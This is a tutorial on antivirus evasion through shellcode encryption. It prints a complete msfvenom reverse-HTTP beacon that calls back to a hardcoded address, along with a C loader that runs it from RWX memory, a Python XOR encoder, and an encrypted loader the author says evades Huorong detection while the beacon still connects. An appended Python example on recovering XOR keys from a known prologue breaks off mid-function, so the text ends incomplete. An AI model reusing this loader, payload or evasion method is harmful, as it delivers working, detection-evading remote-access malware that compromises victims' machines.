
[AV Evasion] C2 Evasion Techniques (3): Shellcode Encryption

Preface

Shellcode encryption is one form of shellcode obfuscation. Several obfuscation approaches exist: encryption (or encoding), offset obfuscation, UUID obfuscation, IPv4-string obfuscation, MAC-address obfuscation, and so on.

As antivirus products have evolved, their detection has long since moved beyond traditional static signature matching. Modern AV typically runs a suspicious file in a controlled virtual environment and hooks API calls to intercept and trace them, judging from that whether the program's behaviour is legitimate. More advanced products (Kaspersky, for example) also scan process memory, so shellcode can be exposed the moment it has been decrypted in memory, which makes evasion considerably harder.

Against that backdrop, shellcode obfuscation alone is no longer enough to bypass every detection mechanism. That does not mean obfuscation has stopped working. In the overall evasion workflow, static evasion is still the first gate: only once static detection has been avoided is there any room for sandbox evasion, dynamic behaviour evasion, memory protection and the other strategies. Shellcode obfuscation therefore keeps a central place in static evasion and remains an indispensable part of the evasion toolkit.

Once obfuscation is in hand, combining it with dynamic evasion techniques is what lets you get past the layered defences of today's mainstream AV more reliably and raise the overall success rate.

Shellcode encryption types

Shellcode encryption means processing the raw shellcode with some encryption algorithm (XOR, AES, RC4, etc.) so that its bytes no longer look like malicious code and the real instructions are hidden. The goal is to defeat AV detection, in particular static scanning and signature extraction; it does nothing by itself against behavioural analysis once the payload is running.

Below are some practical encryption types, rated by their effectiveness in real evasion work:

| Encryption type | Practical? | Use case | Notes |
| --- | --- | --- | --- |
| XOR (variants) | ✅ ⭐⭐⭐⭐⭐ | Shellcode, string encryption | Simple and fast, easy to vary, well suited to runtime decryption |
| AES (ECB/CBC) | ✅ ⭐⭐⭐⭐ | Beacon config, payload protection | Strong cipher, but the decryption routine itself must be hidden sensibly |
| RC4 / RC4-drop | ✅ ⭐⭐⭐ | In-memory data, module communication | Fast and lightweight at runtime, suited to hiding network data |
| Base64 / Base32 | ✅ ⭐ | Masking sensitive fields only | Encoding, not encryption; trivially recognised |
| Custom algorithm | ✅ ⭐⭐⭐⭐⭐ | Embedded payload, decrypt stub | No existing signature to match; harder to recognise automatically (cryptographic strength is irrelevant here, the goal is only to change the bytes) |
| Curve25519 + ChaCha20 | ✅ ⭐⭐⭐ | Advanced C2 transport (e.g. Sliver) | Transport-layer encryption, aimed at confidentiality on the wire |
| Shikata Ga Nai / polymorphic encoder | ✅ ⭐⭐⭐ | Shellcode encoding | Highly variable, but heavily signatured; needs variants |

Implementation steps

1. Generate the shellcode

2. Encrypt the shellcode

3. Build a shellcode loader that decrypts the encrypted shellcode in memory and executes it

4. Compile to an exe

XOR encryption

1. First, write a loader that runs the shellcode in a new thread

#include <windows.h>

int main() {
    // Shellcode stored as an unsigned char array (msfvenom output, still in plaintext)
    unsigned char shellcode[] =
        "\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41"
        "\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a";

    // Allocate executable memory
    LPVOID mem = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (mem == NULL) {
        return 1;
    }

    // Copy the shellcode into the allocated memory
    memcpy(mem, shellcode, sizeof(shellcode));

    // Create a thread that executes the shellcode
    HANDLE thread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)mem, NULL, 0, NULL);
    if (thread == NULL) {
        VirtualFree(mem, 0, MEM_RELEASE);
        return 1;
    }

    // Wait for the thread to finish
    WaitForSingleObject(thread, INFINITE);

    // Clean up
    CloseHandle(thread);
    VirtualFree(mem, 0, MEM_RELEASE);
    return 0;
}

Test: the beacon checks in normally.

Once compiled, Huorong (火绒) flags it instantly.

2. XOR-encrypt the shellcode; the key is the string "kun"

raw_shellcode = (
    b"\xfc\x48\x83\xe4\xf0\xe8\xc8\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x66\x81\x78\x18\x0b\x02\x75\x72\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b\x12\xe9\x4f\xff\xff\xff\x5d\x6a\x00\x49\xbe\x77\x69\x6e\x69\x6e\x65\x74\x00\x41\x56\x49\x89\xe6\x4c\x89\xf1\x41\xba\x4c\x77\x26\x07\xff\xd5\x48\x31\xc9\x48\x31\xd2\x4d\x31\xc0\x4d\x31\xc9\x41\x50\x41\x50\x41\xba\x3a\x56\x79\xa7\xff\xd5\xeb\x73\x5a\x48\x89\xc1\x41\xb8\x5d\x11\x00\x00\x4d\x31\xc9\x41\x51\x41\x51\x6a\x03\x41\x51\x41\xba\x57\x89\x9f\xc6\xff\xd5\xeb\x59\x5b\x48\x89\xc1\x48\x31\xd2\x49\x89\xd8\x4d\x31\xc9\x52\x68\x00\x02\x40\x84\x52\x52\x41\xba\xeb\x55\x2e\x3b\xff\xd5\x48\x89\xc6\x48\x83\xc3\x50\x6a\x0a\x5f\x48\x89\xf1\x48\x89\xda\x49\xc7\xc0\xff\xff\xff\xff\x4d\x31\xc9\x52\x52\x41\xba\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x85\x9d\x01\x00\x00\x48\xff\xcf\x0f\x84\x8c\x01\x00\x00\xeb\xd3\xe9\xe4\x01\x00\x00\xe8\xa2\xff\xff\xff\x2f\x64\x33\x64\x62\x00\xf5\x94\xfa\xd2\xee\x16\xe8\xb9\xf9\x8f\x0f\x9f\xc3\xe9\x41\x35\xe7\x40\xc2\x70\xc2\x50\x6f\xee\xc6\x0a\xf5\xb7\x6f\x6c\x82\xd1\x2d\x49\x14\x72\xb9\x8b\xf7\xa7\xc5\x43\x17\x2d\x96\x3c\x97\x61\x77\x35\xd4\xad\x07\xc1\x1b\xae\x6e\x7b\x04\x8f\x16\x7c\x45\x75\x41\xaf\x52\x36\x8b\x30\x64\xef\x12\x00\x55\x73\x65\x72\x2d\x41"
    b"\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x29\x20\x4c\x42\x42\x52\x4f\x57\x53\x45\x52\x0d\x0a\x00\xd8\x1d\x49\xcd\x7c\x67\xd4\x35\x0a\xcd\x0b\x6f\x43\xb8\x2d\x58\x61\xd6\x49\x96\xe8\x8a\xc9\x00\xd6\x78\xbd\xce\x7e\xe8\xe6\xd3\x0c\x4f\xe3\x8a\xcc\x11\x7b\x4e\x34\xfd\x8d\xa4\xf0\xde\x80\x20\x4a\x98\x17\x3a\xd2\xa4\x8a\x68\xce\x78\xa7\xb6\xd7\x46\x52\x70\x9e\x6a\xf9\xcb\x62\xb9\xa7\xea\xaf\xd1\xfa\x0c\xb5\x89\x98\x3d\x58\xe4\x0c\x7f\xa0\x0e\xb9\x56\x42\x5c\x82\x89\xd9\x01\x94\xc2\x4c\xd9\x8b\x5b\x53\x9e\x33\x42\x2f\x4e\x21\xce\xb4\xa8\x0b\x14\x91\x95\x65\x8a\x4b\x68\xee\xe0\x90\xed\xc5\xa1\x85\x04\x89\x2e\xc0\xa0\x14\x94\xc1\x60\xb2\x3a\xa3\x36\x17\x6e\x0a\xe8\xa5\xc8\xe2\x9c\x42\xcd\x8a\x2e\xf5\xf6\xbb\x68\x34\x73\xf7\x9b\x69\x0c\xf5\x97\xc8\x4a\x4a\x59\x44\x63\x43\x2b\x91\xc9\xa0\x25\x41\xa2\xdf\x26\x98\xf9\x53\xbe\x1c\xc8\x6d\xe8\x24\x34\xd8\x9a\x72\x21\xf1\x57\xe2\x81\x9d\x35\x62\x0b\x91\x3f\x3d\xa5\x3e\x83\xb7\x60\x9a\x20\xd9\xb7\xa4\x69\x96\x00\x41\xbe\xf0\xb5\xa2\x56\xff\xd5\x48\x31\xc9\xba\x00\x00\x40\x00\x41\xb8\x00\x10\x00\x00\x41\xb9\x40\x00\x00\x00\x41\xba\x58\xa4\x53\xe5\xff\xd5\x48\x93\x53\x53\x48\x89\xe7\x48\x89\xf1\x48\x89\xda\x41\xb8\x00\x20\x00\x00\x49\x89\xf9\x41\xba\x12\x96\x89\xe2\xff\xd5\x48\x83\xc4\x20\x85\xc0\x74\xb6\x66\x8b\x07\x48\x01\xc3\x85\xc0\x75\xd7\x58\x58\x58\x48\x05\x00\x00\x00\x00\x50\xc3\xe8\x9f\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x34\x38\x2e\x31\x00\x00\x0a\x2c\x2a"
)
key = b"kun"
encoded = bytes([b ^ key[i % len(key)] for i, b in enumerate(raw_shellcode)])
print(", ".join(f"0x{b:02x}" for b in encoded))

The encrypted shellcode

3. Modify the loader so that it decrypts the shellcode in memory and then executes it

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// The string "kun" is used as the XOR key
unsigned char xor_key[] = { 'k', 'u', 'n' };
const size_t key_len = sizeof(xor_key);

// XOR-obfuscated shellcode (replace with your own encoded shellcode)
unsigned char encoded_shellcode[] = { 
0x97, 0x3d, 0xed, 0x8f, 0x85, 0x86, 0xa3, 0x75, 0x6e, 0x6b, 0x34, 0x3f, 0x2a, 0x25, 0x3c, 0x3a, 0x23, 0x26, 0x5a, 0xa7, 0x0b, 0x23, 0xfe, 0x3c, 0x0b, 0x3d, 0xe5, 0x39, 0x6d, 0x26, 0xe0, 0x27, 0x4e, 0x23, 0xfe, 0x1c, 0x3b, 0x3d, 0x61, 0xdc, 0x3f, 0x24, 0x26, 0x44, 0xa7, 0x23, 0x44, 0xae, 0xc7, 0x49, 0x0f, 0x17, 0x77, 0x42, 0x4b, 0x34, 0xaf, 0xa2, 0x78, 0x2f, 0x6a, 0xb4, 0x8c, 0x86, 0x27, 0x2f, 0x3a, 0x3d, 0xe5, 0x39, 0x55, 0xe5, 0x29, 0x49, 0x26, 0x6a, 0xa5, 0x08, 0xea, 0x0d, 0x76, 0x60, 0x77, 0x1b, 0x19, 0xfe, 0xee, 0xe3, 0x75, 0x6e, 0x6b, 0x3d, 0xeb, 0xab, 0x01, 0x09, 0x23, 0x74, 0xbe, 0x3b, 0xfe, 0x26, 0x73, 0x31, 0xe5, 0x2b, 0x55, 0x27, 0x6a, 0xa5, 0x8d, 0x3d, 0x3d, 0x91, 0xa2, 0x34, 0xe5, 0x5f, 0xfd, 0x26, 0x6a, 0xa3, 0x23, 0x5a, 0xbc, 0x26, 0x5a, 0xb5, 0xc2, 0x2a, 0xb4, 0xa7, 0x66, 0x34, 0x6f, 0xaa, 0x4d, 0x8e, 0x1e, 0x84, 0x22, 0x68, 0x39, 0x4a, 0x63, 0x30, 0x57, 0xba, 0x00, 0xb6, 0x33, 0x31, 0xe5, 0x2b, 0x51, 0x27, 0x6a, 0xa5, 0x08, 0x2a, 0xfe, 0x62, 0x23, 0x31, 0xe5, 0x2b, 0x69, 0x27, 0x6a, 0xa5, 0x2f, 0xe0, 0x71, 0xe6, 0x23, 0x74, 0xbe, 0x2a, 0x2d, 0x2f, 0x33, 0x2b, 0x37, 0x31, 0x34, 0x36, 0x2a, 0x2c, 0x2f, 0x31, 0x3d, 0xed, 0x87, 0x55, 0x2f, 0x39, 0x8a, 0x8e, 0x33, 0x34, 0x37, 0x31, 0x3d, 0xe5, 0x79, 0x9c, 0x21, 0x94, 0x8a, 0x91, 0x36, 0x1f, 0x6e, 0x22, 0xcb, 0x19, 0x02, 0x1b, 0x07, 0x05, 0x10, 0x1a, 0x6b, 0x34, 0x38, 0x22, 0xfc, 0x88, 0x27, 0xfc, 0x9f, 0x2a, 0xcf, 0x22, 0x1c, 0x53, 0x69, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0x26, 0x5a, 0xa7, 0x23, 0x5a, 0xb5, 0x23, 0x5a, 0xbc, 0x2f, 0x3b, 0x34, 0x3e, 0x2a, 0xcf, 0x54, 0x3d, 0x0c, 0xc9, 0x94, 0xa0, 0x85, 0x18, 0x2f, 0x26, 0xe2, 0xb4, 0x2f, 0xd3, 0x28, 0x7f, 0x6b, 0x75, 0x23, 0x5a, 0xbc, 0x2f, 0x3a, 0x34, 0x3f, 0x01, 0x76, 0x2f, 0x3a, 0x34, 0xd4, 0x3c, 0xfc, 0xf1, 0xad, 0x8a, 0xbb, 0x80, 0x2c, 0x35, 0x23, 0xfc, 0xaf, 0x23, 0x44, 0xbc, 0x22, 0xfc, 0xb6, 0x26, 0x44, 0xa7, 0x39, 0x1d, 0x6e, 0x69, 0x35, 0xea, 0x39, 0x27, 0x2f, 0xd1, 0x9e, 0x3b, 0x45, 0x4e, 0x91, 0xbe, 0x3d, 0xe7, 0xad, 0x3d, 0xed, 0xa8, 0x25, 0x04, 
0x61, 0x2a, 0x26, 0xe2, 0x84, 0x26, 0xe2, 0xaf, 0x27, 0xac, 0xb5, 0x91, 0x94, 0x8a, 0x91, 0x26, 0x44, 0xa7, 0x39, 0x27, 0x2f, 0xd1, 0x58, 0x68, 0x73, 0x0e, 0x91, 0xbe, 0xf0, 0xae, 0x64, 0xf0, 0xf3, 0x6a, 0x75, 0x6e, 0x23, 0x8a, 0xa1, 0x64, 0xf1, 0xe2, 0x6a, 0x75, 0x6e, 0x80, 0xa6, 0x87, 0x8f, 0x74, 0x6e, 0x6b, 0x9d, 0xcc, 0x94, 0x8a, 0x91, 0x44, 0x11, 0x5d, 0x0f, 0x17, 0x6e, 0x9e, 0xe1, 0x94, 0xb9, 0x9b, 0x78, 0x83, 0xcc, 0x97, 0xe4, 0x7a, 0xf1, 0xa8, 0x9c, 0x2f, 0x5e, 0x92, 0x2e, 0xa9, 0x05, 0xac, 0x3b, 0x1a, 0x80, 0xad, 0x7f, 0x9b, 0xdc, 0x1a, 0x02, 0xe9, 0xa4, 0x43, 0x22, 0x61, 0x1c, 0xd2, 0xfe, 0x99, 0xcc, 0xb0, 0x2d, 0x7c, 0x58, 0xf8, 0x57, 0xe2, 0x0f, 0x1c, 0x40, 0xba, 0xc6, 0x72, 0xaf, 0x70, 0xdb, 0x00, 0x10, 0x71, 0xe1, 0x7d, 0x09, 0x2b, 0x1e, 0x34, 0xc1, 0x39, 0x43, 0xe5, 0x5b, 0x11, 0x81, 0x79, 0x75, 0x3b, 0x18, 0x10, 0x1c, 0x46, 0x34, 0x09, 0x0e, 0x1b, 0x1a, 0x51, 0x55, 0x23, 0x04, 0x0f, 0x07, 0x07, 0x19, 0x0f, 0x44, 0x40, 0x40, 0x5b, 0x55, 0x46, 0x08, 0x1a, 0x03, 0x1b, 0x14, 0x1a, 0x02, 0x17, 0x02, 0x0e, 0x4e, 0x4e, 0x26, 0x26, 0x27, 0x2e, 0x55, 0x57, 0x45, 0x45, 0x55, 0x4b, 0x22, 0x07, 0x05, 0x11, 0x01, 0x1c, 0x06, 0x4e, 0x25, 0x21, 0x4e, 0x5d, 0x5b, 0x5f, 0x50, 0x55, 0x3a, 0x19, 0x1c, 0x0a, 0x0e, 0x1b, 0x1a, 0x44, 0x40, 0x40, 0x5b, 0x5c, 0x4e, 0x27, 0x37, 0x2c, 0x39, 0x3a, 0x39, 0x38, 0x30, 0x3c, 0x66, 0x7f, 0x6e, 0xb3, 0x68, 0x27, 0xa6, 0x09, 0x09, 0xbf, 0x40, 0x64, 0xa6, 0x7e, 0x01, 0x28, 0xcd, 0x43, 0x33, 0x14, 0xb8, 0x22, 0xe3, 0x86, 0xe1, 0xbc, 0x6e, 0xbd, 0x0d, 0xd3, 0xa5, 0x0b, 0x86, 0x8d, 0xa6, 0x62, 0x24, 0x96, 0xe4, 0xa7, 0x64, 0x15, 0x25, 0x41, 0x93, 0xe6, 0xd1, 0x9e, 0xb5, 0xf5, 0x4e, 0x21, 0xed, 0x79, 0x51, 0xa7, 0xca, 0xe1, 0x1d, 0xa0, 0x13, 0xd2, 0xd8, 0xbc, 0x33, 0x3c, 0x1b, 0xeb, 0x04, 0x92, 0xbe, 0x0c, 0xd2, 0xd2, 0x84, 0xc4, 0xa4, 0x94, 0x67, 0xc0, 0xe7, 0xf3, 0x48, 0x36, 0x8f, 0x79, 0x11, 0xcb, 0x7b, 0xd7, 0x3d, 0x37, 0x32, 0xe9, 0xfc, 0xb7, 0x6a, 0xe1, 0xac, 0x27, 0xac, 0xe5, 0x30, 0x26, 0xf0, 0x58, 0x37, 0x41, 0x25, 0x54, 0xa0, 
0xdf, 0xdd, 0x65, 0x7f, 0xe4, 0xfb, 0x0e, 0xff, 0x25, 0x03, 0x9b, 0x8e, 0xfb, 0x98, 0xab, 0xca, 0xf0, 0x6a, 0xe2, 0x5b, 0xae, 0xcb, 0x61, 0xfa, 0xaa, 0x15, 0xdc, 0x51, 0xd6, 0x58, 0x7c, 0x1b, 0x64, 0x83, 0xd0, 0xa6, 0x89, 0xe9, 0x2c, 0xa6, 0xff, 0x40, 0x9e, 0x83, 0xd5, 0x03, 0x41, 0x1d, 0x9c, 0xee, 0x07, 0x67, 0x80, 0xf9, 0xa3, 0x3f, 0x24, 0x32, 0x31, 0x0d, 0x28, 0x5e, 0xff, 0xa2, 0xd5, 0x4b, 0x2a, 0xd7, 0xb1, 0x4d, 0xed, 0x97, 0x38, 0xcb, 0x72, 0xa3, 0x18, 0x86, 0x4f, 0x41, 0xb6, 0xf1, 0x07, 0x4f, 0x9a, 0x22, 0x8c, 0xea, 0xe8, 0x5b, 0x09, 0x7e, 0xff, 0x54, 0x48, 0xcb, 0x55, 0xf6, 0xd9, 0x0b, 0xef, 0x4e, 0xb2, 0xc2, 0xca, 0x02, 0xe3, 0x6e, 0x2a, 0xcb, 0x9e, 0xde, 0xd7, 0x38, 0x94, 0xa0, 0x26, 0x5a, 0xbc, 0xd4, 0x6b, 0x75, 0x2e, 0x6b, 0x34, 0xd6, 0x6b, 0x65, 0x6e, 0x6b, 0x34, 0xd7, 0x2b, 0x75, 0x6e, 0x6b, 0x34, 0xd4, 0x33, 0xd1, 0x3d, 0x8e, 0x8a, 0xbb, 0x23, 0xe6, 0x3d, 0x38, 0x3d, 0xe7, 0x8c, 0x3d, 0xe7, 0x9a, 0x3d, 0xe7, 0xb1, 0x34, 0xd6, 0x6b, 0x55, 0x6e, 0x6b, 0x3c, 0xe7, 0x92, 0x34, 0xd4, 0x79, 0xe3, 0xe7, 0x89, 0x8a, 0xbb, 0x23, 0xf6, 0xaa, 0x4b, 0xf0, 0xae, 0x1f, 0xc3, 0x08, 0xe0, 0x72, 0x26, 0x6a, 0xb6, 0xeb, 0xab, 0x00, 0xb9, 0x33, 0x2d, 0x36, 0x23, 0x70, 0x6e, 0x6b, 0x75, 0x6e, 0x3b, 0xb6, 0x86, 0xf4, 0x88, 0x91, 0x94, 0x44, 0x57, 0x59, 0x5b, 0x5f, 0x5d, 0x4d, 0x40, 0x5f, 0x4d, 0x40, 0x5a, 0x75, 0x6e, 0x61, 0x59, 0x44
};
size_t shellcode_len = sizeof(encoded_shellcode);

int main() {
    // Allocate RWX memory
    LPVOID exec_mem = VirtualAlloc(NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!exec_mem) {
        printf("VirtualAlloc failed.\n");
        return -1;
    }

    // Copy the still-encrypted shellcode into the executable memory
    memcpy(exec_mem, encoded_shellcode, shellcode_len);

    // Decrypt the shellcode in place, in the buffer it will run from
    for (size_t i = 0; i < shellcode_len; ++i) {
        ((unsigned char*)exec_mem)[i] ^= xor_key[i % key_len];
    }

    // Create a thread that executes the shellcode
    HANDLE hThread = CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)exec_mem, NULL, 0, NULL);
    if (!hThread) {
        printf("CreateThread failed.\n");
        VirtualFree(exec_mem, 0, MEM_RELEASE);
        return -1;
    }

    // Wait for the shellcode to finish
    WaitForSingleObject(hThread, INFINITE);

    // Clean up
    CloseHandle(hThread);
    VirtualFree(exec_mem, 0, MEM_RELEASE);
    return 0;
}

Note: when adapting the loader, the shellcode hardcoded into it must be stored in its encrypted form; otherwise a static scan finds the plaintext signature straight away. Decrypt it in place in the destination buffer, after it has been written there (with memcpy or an equivalent). Decrypting into a separate buffer before the copy does not put the plaintext on disk (the binary still only contains ciphertext), but it leaves a second plaintext copy in process memory, which is one more thing for a memory scanner to find.

Run test: it checks in, so the code works.

Compiled and packaged, Huorong no longer flags it and the beacon checks in normally.
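The encoder script and the loader above cover the build side of repeating-key XOR. As an added example (not code from the original post), the Python below packages the same XOR as a build-time tool that emits the C array for the loader, and then runs the check a scanner can run against it: because the first bytes of every msfvenom x64 payload are public (the same `fc 48 83 e4 f0 ...` that opens the shellcode shown earlier), a repeating key shorter than that prologue is recovered by XORing the two, with no brute force. The sample payload, the `MSF_X64_PROLOGUE` constant and the function names are constructed for this example.

```python
# Added example (not from the original post): repeating-key XOR as a build-time
# tool, plus the known-plaintext check that shows why a short repeating key is weak.
# The sample payload below is constructed; only its first bytes are the real,
# public msfvenom x64 stub prologue (the same bytes that open the page's shellcode).
from typing import Optional

MSF_X64_PROLOGUE = bytes.fromhex("fc4883e4f0e8c8000000415141505251564831d2")

# Constructed sample: the public prologue followed by filler bytes standing in
# for the rest of the payload (not a working payload).
SAMPLE_SHELLCODE = MSF_X64_PROLOGUE + bytes(range(0x20, 0x80)) + b"\x00" * 8
KEY = b"kun"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    if not key:
        raise ValueError("key must not be empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def to_c_array(data: bytes, name: str = "encoded_shellcode", per_line: int = 16) -> str:
    """Emit the encoded bytes as a C array ready to paste into the loader."""
    rows = []
    for off in range(0, len(data), per_line):
        chunk = data[off:off + per_line]
        rows.append("    " + ", ".join(f"0x{b:02x}" for b in chunk) + ",")
    body = "\n".join(rows)
    return f"unsigned char {name}[] = {{\n{body}\n}};\nsize_t {name}_len = {len(data)};\n"


def recover_xor_key(encoded: bytes, known_prefix: bytes, max_key_len: int = 32) -> Optional[bytes]:
    """Scanner-side check: derive a repeating key from a known plaintext prefix.

    For each candidate length L, the key is forced to be encoded[i] ^ known[i]
    for i < L; it is accepted only if that key also explains at least one more
    byte of the known prefix. Returns the shortest key that works, or None.
    """
    limit = min(max_key_len, len(known_prefix) - 1, len(encoded))
    for key_len in range(1, limit + 1):
        key = bytes(encoded[i] ^ known_prefix[i] for i in range(key_len))
        if xor_bytes(encoded[:len(known_prefix)], key) == known_prefix:
            return key
    return None


def demo() -> dict:
    """Build the artifact, then attack it the way a signature scanner could."""
    encoded = xor_bytes(SAMPLE_SHELLCODE, KEY)
    recovered = recover_xor_key(encoded, MSF_X64_PROLOGUE)
    return {
        "encoded": encoded,
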